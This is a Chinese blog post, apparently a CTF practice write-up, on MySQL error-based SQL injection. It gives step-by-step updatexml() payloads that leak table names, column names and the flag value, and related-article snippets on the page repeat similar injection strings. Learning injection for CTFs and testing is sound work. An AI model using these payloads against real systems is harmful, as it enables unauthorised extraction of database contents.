从SQL注入题中学习sql注入(2)

最新推荐文章于 2024-03-19 13:00:09 发布
最新推荐文章于 2024-03-19 13:00:09 发布
阅读量124 收藏
点赞数
分类专栏: 做题笔记 文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51994984/article/details/115471913
版权

SQL 报错注入

输入1,1’判断是报错注入。
在这里插入图片描述

在这里插入图片描述
用updatexml函数报错注入,报表名。1 union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)
在这里插入图片描述
报字段名1 union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘flag’),0x7e),1)
在这里插入图片描述

读出字段内容1 union select updatexml(1,concat(0x7e,(select flag from flag),0x7e),1)
在这里插入图片描述
发现flag由于回显长度的限制,没有完全返回,使用right函数让后半部分的内容回显出来1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from flag) ,41),0x7e),1);
在这里插入图片描述

布尔盲注和时间盲注过于复杂,直接用sqlmap。

JaCkD0n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql xml函数_MYSQL updatexml()函数报错注入解析
weixin_42188533的博客
02-27 1148
MYSQL updatexml()函数报错注入解析首先了解下updatexml()函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参...
报错注入updatexml函数使用
weixin_43326436的博客
06-03 3840
一. floor()、extractvalue()、updatexml() 函数都是与报错注入有关 二.updatexml函数 使用方式: UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称。 第二个参数:XPath_string (Xpath格式的字符串) 。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值。 还
SQL注入2
ppbgi的博客
03-10 248
一、常见的注入方式: 报错注入: 报错思路: 使用各类函数使得数据库抛出异常或错误来获取数据的目的; 常见的报错注入: 1、extractvalue() 2、floor() 3、updataxml() 4、exp() 5、geometrycollection() 6、multipoint() 7、polygon() 8、multipolygon() 9、linestring() 10、multilinestring() 报错的原理: 1、BIGINT等数据类型的溢出 2、xpath语法
SQL注入】0x2 sql注入基础知识
Mitchell_Donovan的博客
03-30 430
0x2 sql注入基础知识 0x2.1 如何判断否存在sql注入 常见的判断:1、get 单引号判断?id=1' 如果报错说明存在sql注入 例如我们实验室: 打开漏洞环境Less-1错误型GET单引号字符型注入 输入?id=1显示正常 输入?id=1'显示错误,所以就存在sql注入'的url编码是%27 2、get and判断 输入?id=-1 and 1=1 正常 输入?id=-1'and 1=2 报错 如果报错,那就存在sql,在请求字符串或者id参数后面加入 '单引号,是常见的一种发现是否存在
sqli-labs注入骚操作之报错型盲注(updatexml函数
qq_51954912的博客
04-11 655
报错注入的骚操作原理1.floor函数2.updatexml函数3.extractvalue函数实操代码 原理 就报错注入而言,有三种函数 1.floor函数 就目前为止,没学会 2.updatexml函数 其格式为updatexmlxml_doc,Xpath,new_value) 1.xml_doc为XML文档对象名称,Xpath_str是路径格式,new_value是替换符合条件的数据。 很官方,看不懂,附上自己理解。举个栗子: updatexml(1, (concat(0x7e,(select da
微服务架构SpringBlade其api接口存在2处SQL注入
最新发布
qq_39342001的博客
03-19 521
SpringBlade 是一个由商业级项目升级优化而来的微服务架构,采用 Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。任何人在使用本文文中的信息时,应自行承担全部责任,并确保其符合所有相关法律和规定。本文中提及的所有技术和工具,都应在合法和道德的范围内使用。作者不鼓励或支持任何非法或不道德的行为,包括但不限于侵犯版权、侵犯隐私或违反任何其他法律。如果文档中包含任何第三方版权材料,版权归原作者所有,如有侵权,请联系作者进行处理。
DB2数据库SQL注入手册1
08-08
在本手册中,我们将介绍如何在DB2数据库中进行SQL注入攻击的检测和防止。同时,我们还将提供一些实用的SQL语句,用于检测和防止SQL注入攻击。 检测SQL注入 在DB2数据库中,可以使用以下方法来检测SQL注入: 1. ...
Hibernate使用中防止SQL注入的几种方案
01-20
以下是Hibernate中防止SQL注入的几种策略: 1. **对参数名称进行绑定**: 这是Hibernate提供的标准方法,通过创建HQL(Hibernate Query Language)查询并使用`setString()`方法来设置参数。例如: ```java Query...
SQL 注入天书.pdf
08-06
总的来说,《SQL注入天书》及配套的sqli-labs提供了全面的SQL注入学习路径,从基础到高级,从理论到实践,有助于安全专业人士和开发人员增强对这一重要安全威胁的理解和应对能力。通过深入学习和实践,可以有效地...
基于Python的机器学习检测SQL注入.zip
03-03
基于Python的机器学习检测SQL注入.zip 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 ...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
SQL注入----报错注入简介(updatexml
一只web狗
06-21 3459
报错注入(updatexml)常用语句
updatexml函数-报错注入原理学习
热门推荐
身高两米不到的博客
03-17 1万+
注入之前,首先得明白updatexml函数利用方式以及函数语法。 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以上是网上搜索的含义,看到以上内容,我不知道是不是有人和
MySQL sql注入 updat_SQL注入实战之报错注入篇(updatexml extractvalue floor)
weixin_35510630的博客
01-21 299
知识铺垫在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入之报错注入篇。首先我们来细分一下SQL注入分类SQL注入分类:回显正常---> 联合查询 union select回显报错---> Duplicate entry()extractvalue()updatexml()盲注 --->布尔型盲注基于时间的盲注sleep()在探讨...
一道综合渗透题引发的updatexml()注入思考
Grey的博客
05-09 1万+
MYSQL数据库updatexml报错注入UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格...
墨者 - SQL注入漏洞测试(报错盲注)
吃肉唐僧的博客
07-07 2700
根据题意,用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表' and updatexml(1,concat(0x7e,(select table_n...
墨者SQL注入漏洞测试(报错盲注)
wswr的博客
03-17 359
思路:找注入点,然后发现还是老地方,然后用 and 1=1 和 and 1=2 结果都一样,猜测应是and被过滤了,然后是用 单引号发现报错,说明注入点就在这,根据题目 报错注入,那么注入的流程就很显而易见了 首先是要知道报错注入时用的语句 ' and updatexml(1,concat(0x7e,(X),0x7e),1)--+ 【0x7e 其实指的就是~,在这里其实是可以随便换的,深入了解报错函数原理的话 SQL字符型注入(get)-利用updatexml函数-报错注入 - 知乎】 X就是平时
实验吧_加了料的报错注入
a173262565的博客
04-02 124
页面提示我们POSTusername与password两个参数,看了看源码,里面提示了我们sql语句 $sql="select * from users where username='$username' and password='$password'"; 先随手post几个数试试,发现页面返回有四种形式,当输入admin,admin时返回Login failed,...
SQL注入之POST注入和HEAD注入
qq_68233961的博客
07-10 1329
SQL注入之POST注入和HEAD注入
SQL注入基础教程:从零开始学习
"这篇资料是PKAV出品的关于SQL注入基础的教程,适合初学者学习。教程通过一个寓言故事引入,讲述了SQL注入的基本概念、形成原因、在渗透测试中的应用,以及常见的注入过程。教程内容包括数据库基础、SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值